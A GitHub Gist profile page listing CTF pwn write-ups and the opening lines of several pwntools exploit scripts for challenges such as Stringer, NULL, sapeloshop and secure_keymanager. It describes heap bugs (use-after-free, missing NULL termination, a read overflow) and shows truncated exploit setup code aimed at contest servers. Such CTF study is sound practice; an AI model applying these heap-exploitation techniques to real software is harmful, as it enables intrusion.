Skip to content

Instantly share code, notes, and snippets.

View romanking98's full-sized avatar

romanking98

45 followers · 1 following
View GitHub Profile
@romanking98
romanking98 / 1_stringer_writeup.md
Last active August 16, 2018 10:45
rctf-2018-exploits

Stringer (18 solves)

Challenge from RCTF, prequals to XCTF.

Bugs

There are 2 bugs in the program : the first is an obvious UAF. The second is no NULL termination immediately after our input, allowing us to leak. NULL byte terminates at buf + size - 1, read loop breaks if buf == "\n"

However, leaking is tricky since program uses calloc, which sets the newly allocated heap chunk to 0x00.

@romanking98
romanking98 / House_of_Roman.md
Last active February 9, 2024 04:21
@romanking98
romanking98 / gogogadget_writeup.md
Created March 24, 2018 15:18

GoGoGadget (1 solve)

Tool credits : @scwuaptx, pwngdb for making public awesome malloc research

Layout

*------------------------------*
 Hi Inspector!
@romanking98
romanking98 / null_writeup.md
Last active April 18, 2018 13:57

NULL ( 17-18 solves)

Challenge makes a thread to do the job. So , a thread_arena is created on a new mmap_segment.

Bug

Overflow in read function :

 for ( i = 0LL; ; i += v3 )
 {
@romanking98
romanking98 / exploit_sapeloshop.py
Created January 22, 2018 13:37
#!/usr/bin/python
from pwn import *
elf = ELF("./libc-2.23.so")
#r = remote("http://sapeloshop.teaser.insomnihack.ch",80)
r = remote('sapeloshop.teaser.insomnihack.ch', 80)
#r = process("./sapeloshop",env={"LD_PRELOAD":"./libc-2.23.so"})
raw_input()
i = int("3d714", 16)
@romanking98
romanking98 / exploit_readme.py
Last active January 16, 2018 08:50
#!/usr/bin/python
from pwn import *
p = remote("35.198.130.245", 1337)
#p = process("./readme_revenge")
raw_input()
#name = "A"*920
name = p64(0x00) # Pass NULL Check.
name += "XXXX"
@romanking98
romanking98 / exploit_memo.py
Created December 17, 2017 16:10
#!/usr/bin/python
from pwn import *
elf = ELF("./libc-2.23.so")
p = remote("159.203.116.12", 8888)
#p = process("./memo",env={"LD_PRELOAD":"./libc-2.23.so"})
raw_input()
def menu():
p.recvuntil(">")
@romanking98
romanking98 / exploit_left.py
Created December 17, 2017 16:07
#!/usr/bin/python
from pwn import *
rol1 = lambda val, r_bits, max_bits: \
(val << r_bits%max_bits) & (2**max_bits-1) | \
((val & (2**max_bits-1)) >> (max_bits-(r_bits%max_bits)))
ror1 = lambda val, r_bits, max_bits: \
((val & (2**max_bits-1)) >> r_bits%max_bits) | \
(val << (max_bits-(r_bits%max_bits)) & (2**max_bits-1))
@romanking98
romanking98 / exploit_secure.py
Created December 11, 2017 08:21
#!/usr/bin/python
from pwn import *
p = remote("secure_keymanager.pwn.seccon.jp",47225)
#p = process("./secure_keymanager",env={"LD_PRELOAD" : "./libc-2.23.so"})
raw_input()
def menu():
p.recvuntil(">>")